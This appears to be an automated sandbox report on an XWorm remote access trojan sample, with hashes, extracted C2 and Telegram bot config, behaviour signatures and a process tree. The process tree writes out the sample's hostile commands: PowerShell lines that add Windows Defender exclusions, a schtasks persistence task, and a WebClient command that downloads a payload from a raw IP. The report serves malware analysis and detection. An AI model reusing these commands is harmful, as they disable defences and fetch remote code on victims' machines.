Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/05/2024, 01:10

General

  • Target

    287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe

  • Size

    199KB

  • MD5

    73309cc961f9645c1c2562ffcdc2dab1

  • SHA1

    6a8545c08c931e016198c80b304ade1c1e8f7a17

  • SHA256

    287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298

  • SHA512

    89858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914

  • SSDEEP

    3072:Pp/WjbfQnyH5oGpIlkOpXFcdXrOjVbcL/6Z3zPK2Cu:KbYymGpIlHuKoLC9/

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://193.222.96.193:81/besho/besho.mp4

Extracted

Family

xworm

C2

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    taskmgr.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Detects Windows executables referencing non-Windows User-Agents 2 IoCs
  • Detects executables using Telegram Chat Bot 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe
    "C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3552
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
      2⤵
      • Creates scheduled task(s)
      PID:4636
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
  • C:\ProgramData\taskmgr.exe
    C:\ProgramData\taskmgr.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1160
  • C:\ProgramData\taskmgr.exe
    C:\ProgramData\taskmgr.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1444

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\ssa.vbs

    Filesize

    733B

    MD5

    68c8c79d84f5e3f10dd9328272b0ac55

    SHA1

    5ab9a13ec0d01fc1ed71c27a1a23a61019cb8946

    SHA256

    29841f038da6a26dac5df28f23b4adcb080f5b0a2312bf996c8073940849eef6

    SHA512

    d86bd0ac3bd58ee9a1b06e1edba3c03788136292d81bd9cf025525c3a0e40bba9a7b6d5859833a9d470d29ab31b35d5515855a78691bfe54477631d9a0733f6a

  • C:\ProgramData\taskmgr.exe

    Filesize

    199KB

    MD5

    73309cc961f9645c1c2562ffcdc2dab1

    SHA1

    6a8545c08c931e016198c80b304ade1c1e8f7a17

    SHA256

    287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298

    SHA512

    89858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    a43e653ffb5ab07940f4bdd9cc8fade4

    SHA1

    af43d04e3427f111b22dc891c5c7ee8a10ac4123

    SHA256

    c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

    SHA512

    62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\taskmgr.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    eeb3765a0b785f234084876821b1e55f

    SHA1

    6312e19d05292ef7b9c6127f26f1763645be6f2b

    SHA256

    2f3ef2bab47b2fb619171ccb5e41c4227093b0e572e4331ee18eecefa97c18e8

    SHA512

    85d516c29afb12e801a6b717c4b809eb8b0cb22dd286d569bb60ee6cf6f0670857e23566addc03a65eb7d9ec88b1805db7a787323863039d28019e426e2e6a7b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    eb1ad317bd25b55b2bbdce8a28a74a94

    SHA1

    98a3978be4d10d62e7411946474579ee5bdc5ea6

    SHA256

    9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

    SHA512

    d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cae60f0ddddac635da71bba775a2c5b4

    SHA1

    386f1a036af61345a7d303d45f5230e2df817477

    SHA256

    b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

    SHA512

    28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    da185fddf7e751e39023edde12930f37

    SHA1

    657fcb7fda401b69d3bb97e7b6abf126ac36d4b2

    SHA256

    8928226805a92acd76d21e1a276176d9af3ca1ec31f14e45a2b4b88f4722cad5

    SHA512

    db7bc02a1bd86d587840a56334dee9cb80aa0a8635cd2eb1c490bc5466659350de4d625f320731e34fac235016515d0dddc05a6081149dc6c2e82c262be6b975

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oztgipkl.vzn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/468-2-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/468-0-0x00007FFD7C503000-0x00007FFD7C505000-memory.dmp

    Filesize

    8KB

  • memory/468-57-0x00007FFD7C503000-0x00007FFD7C505000-memory.dmp

    Filesize

    8KB

  • memory/468-58-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/468-63-0x0000000001120000-0x000000000112A000-memory.dmp

    Filesize

    40KB

  • memory/468-1-0x00000000008F0000-0x0000000000928000-memory.dmp

    Filesize

    224KB

  • memory/3456-12-0x00000206C0390000-0x00000206C03B2000-memory.dmp

    Filesize

    136KB

  • memory/3456-18-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3456-15-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3456-13-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3456-14-0x00007FFD7C500000-0x00007FFD7CFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/3960-78-0x00000237DFC90000-0x00000237DFCCB000-memory.dmp

    Filesize

    236KB